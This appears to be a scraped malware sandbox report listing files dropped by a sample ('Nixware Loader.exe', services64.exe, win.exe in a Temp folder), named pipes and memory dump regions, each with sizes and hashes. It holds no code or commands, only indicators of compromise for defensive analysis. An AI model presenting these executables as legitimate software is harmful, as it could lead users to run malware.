e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
C:\Users\Admin\AppData\Local\Temp\win.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
C:\Users\Admin\AppData\Local\Temp\win.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_1164_ABWDTHDYEKADZNVW

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_2052_LLEGNKLRNWGTVTLW

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\1.exe

Filesize
274KB

MD5
24a51d78647223ee11b910e14f2a30b1

SHA1
22efce1a9f8dbac3a79367a8b0911307703ee46d

SHA256
f07a6569599e817964fadf806eb0a87e3420179fbc23623a3f2ef395dc4a27f5

SHA512
007acfe559face066ee489ba8aff4b894f1a44265433fa221ad5844bc118fcb6adde159bef1fc4e7675c88ad74fcc9e1fc1966b6c44b261ce4bd6160534ca867

Download Submit
\Users\Admin\AppData\Local\Temp\Nixware Loader.exe

Filesize
19KB

MD5
17f672a433b839d5a307e7c832c55b23

SHA1
18ac995567d8cbe3977ccaa6af017f464115a6f2

SHA256
2798489b1dcb73e61e5a38e4655e5f48843f7a5b6d1387349fbb0c0bbc42943f

SHA512
6fffce3343ef81779c3d8f3c26418e195c87be8199b62d5d0066e89f41bf13a5fae616135eb34201c92bcafee2fee9a7bc8f847d589818d16fa3945c84a45cd6

Download Submit
\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
\Users\Admin\AppData\Local\Temp\win.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
\Users\Admin\AppData\Local\Temp\win.exe

Filesize
2.1MB

MD5
d8abaf1076d66e5f87487588d8043183

SHA1
54027b5e8f86bf2dbb4b6ea46f8b24a9cde3002a

SHA256
9c14204dfa2fc52b7f411cff3d8d3e909410ad8607407860e50eb01f6d3bb291

SHA512
e4e26e5687f9097fbad3791ab6dd15740094c192a8f078805c4adbb059e2770e747118e50477ae44ecded15152c12df77ef96ebd492990b6d662852792ed8bed

Download Submit
memory/608-77-0x00000000008E0000-0x000000000092A000-memory.dmp

Filesize
296KB

Download
memory/608-62-0x0000000000000000-mapping.dmp

Download
memory/1064-93-0x0000000000000000-mapping.dmp

Download
memory/1148-158-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1148-159-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1284-87-0x000000001B370000-0x000000001B590000-memory.dmp

Filesize
2.1MB

Download
memory/1284-89-0x00000000000D0000-0x00000000002F0000-memory.dmp

Filesize
2.1MB

Download
memory/1596-73-0x0000000000000000-mapping.dmp

Download
memory/1816-154-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/1816-155-0x0000000000290000-0x0000000000296000-memory.dmp

Filesize
24KB

Download
memory/2232-55-0x000007FEFB8F1000-0x000007FEFB8F3000-memory.dmp

Filesize
8KB

Download
memory/2248-60-0x0000000000400000-0x0000000000B0E000-memory.dmp

Filesize
7.1MB

Download
memory/2248-59-0x0000000000400000-0x0000000000B0E000-memory.dmp

Filesize
7.1MB

Download
memory/2248-58-0x0000000074FD1000-0x0000000074FD3000-memory.dmp

Filesize
8KB

Download
memory/2248-74-0x0000000000400000-0x0000000000B0E000-memory.dmp

Filesize
7.1MB

Download
memory/2256-90-0x0000000000000000-mapping.dmp

Download
memory/2336-88-0x0000000000000000-mapping.dmp

Download
memory/2412-67-0x0000000000000000-mapping.dmp

Download
memory/2448-80-0x00000000011A0000-0x00000000011AC000-memory.dmp

Filesize
48KB

Download
memory/2448-91-0x0000000000BE5000-0x0000000000BF6000-memory.dmp

Filesize
68KB

Download
memory/2448-70-0x0000000000000000-mapping.dmp

Download
memory/2448-85-0x0000000000BE5000-0x0000000000BF6000-memory.dmp

Filesize
68KB

Download
memory/2532-76-0x0000000000000000-mapping.dmp

Download
memory/2532-79-0x00000000748D1000-0x00000000748D3000-memory.dmp

Filesize
8KB

Download
memory/2808-97-0x0000000000000000-mapping.dmp

Download
memory/2916-127-0x0000000000000000-mapping.dmp

Download
memory/2932-143-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-148-0x000000014030F3F8-mapping.dmp

Download
memory/2932-138-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-139-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-141-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-135-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-144-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-145-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-147-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-137-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-150-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-151-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/2932-152-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-153-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2932-133-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-131-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-157-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-129-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-128-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2932-160-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download